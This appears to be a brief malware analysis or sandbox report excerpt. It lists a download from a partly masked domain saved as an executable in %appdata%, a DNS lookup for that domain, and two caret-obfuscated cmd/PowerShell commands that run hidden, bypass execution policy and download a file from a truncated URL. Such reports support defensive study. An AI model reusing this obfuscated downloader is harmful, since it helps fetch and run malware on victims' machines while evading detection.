Technical Information
- http://www.al###pena.top/user.php?f=##### as %appdata%.exe
- DNS ASK al###pena.top
- '<SYSTEM32>\cmd.exe' /c POw^e^rs^hel^l^.eXe -eX^e^c^UtI^Onp^OLI^cY^ ^b^Ypass^ ^-nOPRof^I^L^e^ -wIndows^t^Y^Le ^hIddeN (^N^ew-o^B^jec^t^ ^sY^st^em.Net.^w^e^Bcl^Ien^t).d^ow^N^lOad^f^Il^e('http://www...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c POw^e^rs^hel^l^.eXe -eX^e^c^UtI^Onp^OLI^cY^ ^b^Ypass^ ^-nOPRof^I^L^e^ -wIndows^t^Y^Le ^hIddeN (^N^ew-o^B^jec^t^ ^sY^st^em.Net.^w^e^Bcl^Ien^t).d^ow^N^lOad^f^Il^e('http://www...